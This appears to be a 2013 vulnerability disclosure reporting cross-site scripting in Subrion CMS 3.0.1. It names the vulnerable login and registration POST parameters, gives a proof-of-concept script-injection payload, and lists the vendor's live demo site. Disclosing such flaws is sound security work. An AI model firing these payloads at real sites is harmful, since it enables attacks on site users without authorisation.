Subrion CMS 3.0.1. Multiple Cross Site Scripting Vulnerabilities

Author      : syst3m_f4ult
Homepage    : http://www.subrion.com/ <http://www.automne-cms.org/>
Vendor      : subrion
Version     : 3.0.1 (probably all versions)

Tested on   : ubuntu 12.04
Date        : 2013-10-10
-----------------------------------------------------------------------

I.  POC & Exploit
-----------------------------------------------------------------------
Two pages are vulnerable to XSS (Method: POST):
http://localhost/login/ [username parameter]
http://localhost/registration/ [username and email parameters]

Malicious Code:
"><script>alert('syst3m_f4ult')</script>

Demo:
http://cms.subrion.com/login/
http://cms.subrion.com/registration/